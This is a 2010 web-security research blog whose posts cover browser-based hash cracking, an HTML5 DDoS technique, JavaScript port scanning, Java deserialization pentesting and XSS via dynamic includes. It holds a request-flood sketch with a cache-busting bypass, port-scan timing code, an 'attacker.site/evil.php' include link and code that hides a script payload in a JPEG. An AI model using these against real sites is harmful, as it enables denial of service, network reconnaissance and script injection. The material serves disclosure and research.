Thursday, December 16, 2010

Cracking hashes in the JavaScript cloud with Ravan

Password cracking and JavaScript are very rarely mentioned in the same sentence. JavaScript has been a bad choice for the job for two primary reasons: it cannot run continuously for long periods without freezing the browser, and it is far slower than native code.

HTML5 takes care of the first problem with WebWorkers: any website can now start a background JavaScript thread that runs continuously without causing stability issues for the browser. That is one hurdle cleared.

The second issue, speed, is becoming less relevant with each passing day, as JavaScript engines are getting faster at a greater rate than the systems they run on. It might surprise most people how fast JavaScript actually is: 100,000 MD5 hashes/sec on an i5 machine (Opera). That's the best number I could get from my system; in most cases it varies between 50,000 and 100,000 MD5 hashes/sec. This is still about 100-115 times slower than native code on the same machine, but that's alright. What JavaScript lacks in outright speed can be more than made up for by its ability to distribute.

It is trivial to get someone to execute your JavaScript in their browser: just get them to visit a link and you have remote code execution of the JavaScript kind. They don't have to download or install any applications on their system or have any special privileges. It is ridiculously easy to distribute computation with JavaScript. With about 110 browsers pointed at your site you have already matched the speed of native code on one machine. With 1,100 browsers, that is equivalent to 10 machines cracking passwords in native code.

To demonstrate this I have built Ravan, a JavaScript distributed computing system that can crack MD5, SHA1, SHA256 and SHA512 hashes. Details on how it works and how to use it are available here. It was released at BlackHat Abu Dhabi last month and has already had over 700 hash submissions. Both the cracking of the hashes and the management of the distribution process are done in JavaScript.

The commercial cloud might have made cracking hashes super cheap but the JavaScript cloud has made it free.

Wednesday, December 15, 2010

Performing DDoS attacks with HTML5 Cross Origin Requests & WebWorkers

Update: Shellex has performed a detailed performance analysis of this technique.

DDoS attacks are all the rage this year, at least in the latter part of it. There have been numerous successful DDoS attacks in the past few months alone. Some of the current DoS/DDoS options are LOIC, HTTP POST DoS and Jester's unreleased XerXes.

This post is about a DDoS technique I spoke about at BlackHat Abu Dhabi that uses two HTML5 features: WebWorkers and Cross Origin Requests. It is a very simple yet effective technique: start a WebWorker that fires multiple Cross Origin Requests at the target. This is possible because Cross Origin Requests that use the GET method can be sent to any website; the restriction is only on reading the response, which is of no interest in this case anyway. Sending a cross-domain GET request is nothing new - you can do that by embedding a remote URL in an IMG or SCRIPT tag - but the interesting part here is performance. My tests showed that both Safari and Chrome were able to send more than 10,000 Cross Origin Requests in one minute.

So simply by getting someone to visit a URL you can make them send 10,000 HTTP requests/minute to a target of your choice. If you pick a juicy target URL, one that makes the server do some heavy processing, then even 10,000 requests/minute might overwhelm it. Let's scale this a little: say 60 people visit the URL containing the DoS JavaScript - that is 10,000 requests/second at the target. With just 6,000 visitors to this URL we can send around 1 million requests/second at the target. Getting 6,000 Chrome and Safari users to visit a particular URL is no big deal really.

Maybe it's not that simple; there are a few things to consider here. When you send the first request to a particular page and the response does not contain the 'Access-Control-Allow-Origin' header with a suitable value, the browser refuses to send more requests to the same URL. This can however be easily bypassed by making every request unique: add a dummy query-string parameter with changing values. The requests/minute figure is also variable. The browser sends a certain number of requests, and only when it receives the responses does it send the next batch, so as the server slows down, the browser's request rate slows down with it. The figure of 10,000 requests/minute was clocked against a server on the internal network; against a target on the Internet it would realistically be between 3,000 and 4,000 requests/minute. If the attacker is targeting an internal server by getting the employees of that company to visit the malicious URL, then the 10,000 requests/minute rate would apply.
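To illustrate the cache-busting bypass, here is a minimal sketch of the flood logic. The target URL, parameter name and function names are made up for the example; in a real attack the send callback would be an XMLHttpRequest fired from inside a WebWorker, and the loop would run indefinitely:

```javascript
// Sketch of the flood logic (URL and names are illustrative).
// Each request gets a changing dummy query-string parameter so the
// browser never sees a repeated cross-origin URL and therefore
// never stops sending, despite the missing
// Access-Control-Allow-Origin header on the responses.
function bustCache(target, n) {
  const sep = target.includes('?') ? '&' : '?';
  return `${target}${sep}dummy=${n}`;
}

// Drive `send` once per unique URL. A WebWorker would call an
// XMLHttpRequest here and loop forever, throttled only by how
// fast responses come back from the target.
function flood(target, count, send) {
  for (let n = 0; n < count; n++) {
    send(bustCache(target, n));
  }
}

// Example run with a stub sender in place of XHR:
const sent = [];
flood('http://target.example/heavy-page', 3, (url) => sent.push(url));
console.log(sent);
// e.g. [ 'http://target.example/heavy-page?dummy=0', ... ]
```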

I am not going to release any PoC as this is probably a bad time for that, but it shouldn't be very difficult to put something together for testing once you understand how it works. It should be relatively easy to block this attack at the WAF: since all Cross Origin Requests contain the 'Origin' header, you can differentiate between legitimate and malicious requests.

Saturday, December 11, 2010

Port Scanning with HTML5 and JS-Recon

This was one of the newer topics I covered at BlackHat Abu Dhabi. HTML5 has two APIs for making cross-domain calls - Cross Origin Requests and WebSockets. Using them, JavaScript can make connections to any IP and to any port (apart from blocked ports), making them ideal candidates for port scanning.

Both APIs have a 'readyState' property that indicates the status of the connection at a given time. The duration for which a specific readyState value lasts has been found to vary with the status of the target port to which the connection is being made. This means that by observing this difference in behavior we can determine whether the port being connected to is open, closed or filtered. For Cross Origin Requests the telling value is the duration of readyState 1; for WebSockets it is readyState 0.
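The measurement itself can be sketched roughly as below. The polling interval and function names are my own illustration, not JS-Recon's actual code; the socket is injected so the same logic applies to a WebSocket (watch readyState 0) or a Cross Origin Request (readyState 1), and the demo uses a fake socket in place of a real connection attempt:

```javascript
// Sketch: time how long a connection object stays in a given
// readyState. In a browser you would pass in something like
// `new WebSocket('ws://10.0.0.5:8080')` and watch state 0;
// the measured duration differs for open, closed and filtered
// ports, which is what makes the scan possible.
function timeReadyState(socket, watchedState, pollMs = 10) {
  return new Promise((resolve) => {
    const start = Date.now();
    const timer = setInterval(() => {
      if (socket.readyState !== watchedState) {
        clearInterval(timer);
        // Milliseconds spent in the watched state.
        resolve(Date.now() - start);
      }
    }, pollMs);
  });
}

// Demo with a fake socket that leaves readyState 0 after ~50 ms,
// standing in for a real connection attempt.
const fake = { readyState: 0 };
setTimeout(() => { fake.readyState = 3; }, 50);
timeReadyState(fake, 0).then((ms) =>
  console.log(`readyState 0 lasted ~${ms} ms`));
```

Classifying the port then amounts to comparing the measured duration against the calibrated ranges for open, closed and filtered states.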

I tried to calibrate the time durations for the different port states and the data is below. These numbers only hold good when the target is in the internal network. If you are scanning a target on the Internet then the network latency should be taken into account.

Since this is not a socket-level but an application-level scan, success also depends on the nature of the application running on the target port. When a request is sent to certain types of applications, they read it and remain silent, keeping the socket open, probably expecting more input or input in the format they understand. If the target is running such an application then its status cannot be determined.

Since even closed ports can be identified, we can extend this technique to perform network scanning as well as internal IP detection. I have written a tool called JS-Recon which can perform these scans. More details on how JS-Recon works are available here. These techniques only work when run from Windows machines; on *nix systems it is not possible to determine closed ports, and the timing figures are quite different.

Tuesday, December 7, 2010

RSnake, Web Security and a few beers

BlackHat Abu Dhabi 2010 is special to me for many reasons, chief amongst them that I got to meet one of my favorite hackers - RSnake. When I started taking my baby steps in web security, like most people at that time I started off by reading the excellent content available on OWASP, combined with some heavy use of Google. Around this time, I think it was Manish who introduced me to ha.ckers.org - I am so glad that he did, it almost immediately became an addiction. Back then I only understood parts of what was written on ha.ckers.org; sometimes an entire post would be beyond my grasp, but I still enjoyed reading them. It was not just a blog, it was an event - an event where RSnake and his loyal band of commenters had a gala time. There are many instances where I read a few Wikipedia articles and docs to understand a topic just so that I could know what RSnake and the commenters were laughing about.

I did not have to follow the RSS feeds of a few dozen blogs; I only checked ha.ckers.org on a regular basis. If there was interesting news in the web security world, it would be talked about at ha.ckers.org along with RSnake's opinion on how significant it was and how it impacted things, served with a pinch of humor. This was in addition to RSnake's own bag of tricks, which always had something clever. ha.ckers.org was an excellent learning medium and has probably helped and inspired countless folks like me across the world. It is extremely hard to discuss an advanced topic without making a novice reader feel alienated and bored. It is equally hard to discuss a technically simple yet important topic without making the smart ones cringe. Somehow ha.ckers.org managed to do both very well, a feat that is very hard to match.

Coming from a part of the world where you almost never get to meet the famous hackers in person, in our heads RSnake has a larger-than-life image; he is more like a WebAppSec folk hero. So meeting him personally was really special. As a person he is very friendly and chilled out, and he did not seem to mind the fact that I am a relative n00b :D. We spoke for quite a long time, and I heard a lot of interesting stories related to ha.ckers.org, his book and more. Though he didn't seem to like my choice of beer, meeting him has only increased my respect for him. He is one of the key figures who has shaped the web security industry and an inspiration for many.

This is an excerpt from a recent interview with him:
..if you love security, don't let the people at the top of the security industry dictate the terms by which you do your research, disclose your vulnerabilities, or do your job. You have a ton of potential, and life is too short. My Father used to tell me that if you love what you're doing you'll never work another day in your life. To paraphrase him - if you aren't having fun in security, you're doing something wrong. Put a smile on your face, and go do what makes you happy!
This probably says more about him than I could in a few dozen posts. As he shuts down ha.ckers.org to go on a different journey, I would like to wish him success on behalf of all his followers from India. Good luck RSnake!


Monday, November 8, 2010

HTML5 goodness at BlackHat Abu Dhabi this week

Just three more days to go for my 'Attacking with HTML5' talk at BlackHat Abu Dhabi. In addition to covering some of the interesting HTML5 attacks released during 2010 by myself and other researchers, it has two new sections - HTML5-based port scanning and HTML5 botnets. I will be talking about a new way to perform JavaScript-based port scans that gives very accurate results. How accurate? You can determine if the remote port is open, closed or filtered - that accurate. I am also going to release a tool called JS-Recon that performs port and network scans using these techniques. Under HTML5 botnets I am going to talk about how you could send spam mails, perform a DDoS attack on a website and perform distributed cracking of hashes at incredible speeds - all using JavaScript. I am also going to release Ravan, a web-based tool to perform distributed cracking of hashes in a legitimate way. I am pretty happy with the way Ravan has shaped up and am very excited to see how folks react to it. Initial reactions have been good. The whole point of the talk is that I am NOT bypassing any of the restrictions placed by the browser sandbox - I am working well inside those restrictions; it's just that the sandbox has got a whole lot looser :)

The tools and details will be online next week when I am back from Abu Dhabi. Stay tuned!

Tuesday, September 7, 2010

Re-visiting Java De-serialization: It can't get any simpler than this!!


Well, it's been a while since I have blogged. I've been quite busy with work lately. Also, I guess Lava is better at blogging, so I'll leave that to him :)

After my talk at BH EU earlier this year, quite a lot of other really cool work has been published on penetration testing of Java thick/smart clients. Check out JavaSnoop especially; it has some pretty good features you would like to use. Many people I spoke to recently said that modifying objects programmatically using the IRB shell in DSer would be difficult, and that it would require the penetration tester to have in-depth knowledge of the application's source code. Well, in the first place, penetration testing is a skill and it does require hard work, so understanding the application's internals is part and parcel of the job. That being said, DSer allows you to play around with Java objects using an interactive shell with some helper methods, and it is completely extensible. It was meant to be a template - you add your own stuff and extend its capabilities.

In this post I will show you a technique that allows us to extend DSer and simplify the process of modifying Java objects. Before we start I would like to thank my colleague Chilik Tamir for introducing me to the XStream library and helping with this idea. XStream is a library that serializes Java objects to XML and back. Now, getting back to the topic, let's assume that we encounter a complex object in our request or response packet, as follows:

HashMap = { key1 = String[], key2 = HashMap }

I have chosen internally available Java objects for simplicity, but they can be any custom objects you like. Modifying this via hex bytes would be a difficult task, as we will see later. For demonstration purposes, I'll make use of the following app:
Fig. 1: Demo app to generate complex JAVA objects
This application takes the inputs we supply in the 3 text fields, creates a HashMap similar to the one shown above when the "Both" button is pressed, and sends it to the backend server for processing. Once we capture this request in Burp, it gives an output similar to this:
Fig. 2: Request showing raw serialized data captured in Burp
Which will be de-serialized and rendered in the DSer shell as follows:

{ keyTwo = [Ljava.lang.String;@70ac2b, 
  keyOne = { hmKey1=Manish,
             hmKey3=Andlabs,
             hmKey2=Saindane
           }
}

We can see that the HashMap has 2 keys (i.e. keyOne and keyTwo) whose values are a String array and a HashMap. I have added a few custom functions to DSer that use the XStream library to convert the above Java serialized object to XML, save it as a temp file and open it in any XML editor of your choice for further editing. The resulting XML looks as follows:
Fig. 3: XML generated from the JAVA serialized object
Notice how nicely XStream has rendered the XML from the given Java object. We can clearly see the <string-array> and the <map> elements (highlighted above) with the individual entries. We can edit the entries and modify them as we want. Let's modify the XML as follows:
Fig. 4: XML after modification
We have removed the "Andlabs" entry from the String array and added two extra entries (i.e. "Lavakumar" and "Kuppan"). Also, the "hmKey3" entry has been removed from the inner HashMap (highlighted above). As soon as we save this XML and close the editor, the code in DSer converts it back to a Java object which looks similar to this:


{ keyTwo = [Ljava.lang.String;@9568c, 
  keyOne = { hmKey1=Manish,
             hmKey2=Saindane
           }
}

The custom functions then take care of serializing this object, fixing the "Content-Length" header and preparing a new "message" to be sent to the application server. You can observe the modified data in Burp's history tab.

Fig. 5: Edited request as shown in the Burp
So with this technique, modification of Java objects becomes trivial, and anyone with no prior programming knowledge can edit the objects (as long as he/she knows how to edit text or XML ;)). The screenshot shows the modified data being successfully passed to the server and rendered back in the output.
Fig 6: Modified data processed by the application
DSer is not restricted to Java serialized objects; it can handle (almost) any binary protocol you can think of. So do not restrict your thinking - be creative. In this post I showed you how to extend DSer's capabilities and simplify the process of editing Java objects. You can do the same with any other protocol. All you need is a basic understanding of how the protocol works.

I'll add the above-mentioned custom methods to DSer and release it soon. I just need to clean up the code and make a few changes here and there. If anyone needs to try it out in the meantime, just ping me and I'll give you the source code. Until next time, happy hacking!!

Tuesday, August 10, 2010

XSSing client-side dynamic HTML includes by hiding HTML inside images and more

Matt Austin made a brilliant discovery some time back and wrote a detailed post about his hack - you absolutely must read it. Basically it is a problem with sites that use Ajax to fetch the page named in the URL after the # and then include it in the innerHTML of a DIV element; he picks 'touch.facebook.com' as an example.

Quoting from his post:
If you click on any URL you see the links don't actually change the page but loads them with ajax. http://touch.facebook.com/#profile.php actually loads http://touch.facebook.com/profile.php into a div on the page.
The problem here is that the XMLHttpRequest object can now make Cross Origin calls, thanks to HTML5. So if a victim clicks on a link like 'http://touch.facebook.com/#http://attacker.site/evil.php' then 'http://attacker.site/evil.php' is fetched and included in the innerHTML of the page, leading to XSS. Clever find!
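For illustration, the vulnerable pattern boils down to something like the sketch below. The element id and XHR wiring are my own guesses, not Facebook's actual code; the point is that the page name taken from the fragment goes into the request URL unchecked, so an absolute URL reaches the attacker's server once XHR gains cross-origin powers:

```javascript
// Sketch of the vulnerable client-side include pattern.
// The page name is lifted from location.hash with no validation:
function pageFromHash(hash) {
  // '#profile.php' -> 'profile.php', but equally
  // '#http://attacker.site/evil.php' -> the attacker's URL.
  return hash.replace(/^#/, '');
}

/* In the page, the include would look something like:
   const xhr = new XMLHttpRequest();
   xhr.open('GET', pageFromHash(location.hash));
   xhr.onload = function () {
     // Attacker-controlled responseText lands in the DOM as HTML.
     document.getElementById('content').innerHTML = xhr.responseText;
   };
   xhr.send();
*/

console.log(pageFromHash('#profile.php'));                  // 'profile.php'
console.log(pageFromHash('#http://attacker.site/evil.php'));
```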

The very first paragraph of his post however made me very uncomfortable:
HTML 5 does not do much to solve browser security issues. In fact it actually broadens the scope of what can be exploited, and forces developers to fix code that was once thought safe.
Call me an HTML5 fanboy, but I believe the spec designers have taken security very seriously, based on the discussions I have seen while lurking on their mailing lists. So such a blatant allegation was hard for me to digest, and I was secretly hoping that this design was vulnerable even without taking into account the Cross Origin Request feature of HTML5.

And it turns out it is actually vulnerable even with plain old HTML4. The problem is that the application fetches any page provided after the # and includes it in the innerHTML of a DIV element. What this means is that every single file on that site - (CSS|JS|JPG|...|log) - is now treated as HTML.

How is this a problem? Let's say the site lets users upload their profile pictures and stores them under the same domain name (Facebook, however, uses a different domain for static content). Normally this cannot lead to XSS because the image is only referenced from the <img> tag, which parses and renders it as an image. Under the design being discussed, however, the same image file can be rendered as HTML. When a victim clicks on a link like 'http://vulnsite.com/#profile_334616.jpg', 'profile_334616.jpg' is fetched and its 'responseText' is added to the innerHTML property.

It is possible to hide HTML inside images without any visual difference. The HTML can come after the End of Image marker (0xFF 0xD9), or right before it, and the image still looks the same. It can also be added in the comment section, but some sites strip comments from images to save storage space. When the content of such an image is rendered as HTML, the binary section is treated as text and displayed as-is, while the HTML section is parsed and rendered - at least by Chrome, Safari and Firefox. Opera and IE, however, stop parsing after reading a few bytes of the binary content. I tried moving the HTML to the beginning of the image, right after the Start of Image marker inside a comment section, but they still refused to render it.
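As a rough sketch of the trick, the snippet below appends HTML after the End of Image marker of a stub "JPEG" (just a handful of bytes here, not a real image). With a real file the pixel data is untouched, so image viewers show the same picture while an HTML parser finds the payload:

```javascript
// Sketch: append an HTML payload after a JPEG's End of Image
// marker (0xFF 0xD9). Image decoders ignore bytes after EOI, but
// an HTML parser fed the same bytes will find and render the tag.
const EOI = Buffer.from([0xff, 0xd9]);

function appendHtml(jpegBytes, html) {
  // A well-formed JPEG already ends with EOI, so we simply
  // concatenate the payload after it.
  return Buffer.concat([jpegBytes, Buffer.from(html, 'utf8')]);
}

// Stub image: SOI marker (0xFF 0xD8), fake data, EOI marker.
const fakeJpeg = Buffer.from([0xff, 0xd8, 0x01, 0x02, 0x03, 0xff, 0xd9]);
const poisoned = appendHtml(fakeJpeg, '<script>alert(1)</script>');

// The image portion is unchanged and the payload sits after EOI.
console.log(poisoned.indexOf(EOI));         // 5
console.log(poisoned.slice(7).toString());  // '<script>alert(1)</script>'
```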

Check out this simple PoC to see this in action.

Apart from images, any user-uploaded file could potentially turn into HTML under this design. Even if the site has no file upload features, an attacker could get his images onto it indirectly through social engineering. News and media websites routinely include images provided to them from external sources, and an attacker could slip in his HTML-poisoned image, which might eventually end up on the site. Though a little far-fetched, something like this is not entirely impossible. Any compression the server applies to images would, however, mangle the HTML.

Another way an attacker can get his data onto the server is through server logs. If the log file stores User-Agent strings unencoded, an attacker could include HTML in his request's UA field and poison the server log. An administrator with access to these logs could be sent a link like http://admin.vulnsite.com/#August2010.log, and clicking it would eventually lead to that HTML being rendered.

Though there could be other scenarios, I think you get the general idea. So coming back to the design itself: it was vulnerable to begin with, and HTML5's Cross Origin Request made it incredibly easier to exploit.

Even with all these counter-arguments, I eventually have to agree with Matt. Cross Origin Request was one feature where HTML5 actually got it wrong, because it gave additional capability to the same API with absolutely no extra code requirements. The same code can now do things that its developers never anticipated. It's like hitting your car's accelerator one random morning and finding out that it is now also wired to NOS - I don't think you would like that surprise.

IE, on the other hand, did the right thing with XDomainRequest, which is a new API and not a simple extension of XHR. Perhaps the XMLHttpRequest object should get a new property that must be explicitly set to enable COR.

Eg:
var xhr = new XMLHttpRequest();
xhr.cor = true; // hypothetical opt-in property
xhr.open("GET", "http://external.site/");
xhr.send();
A simple extension like this would prevent existing code from becoming vulnerable while giving developers the same familiar XHR API for COR.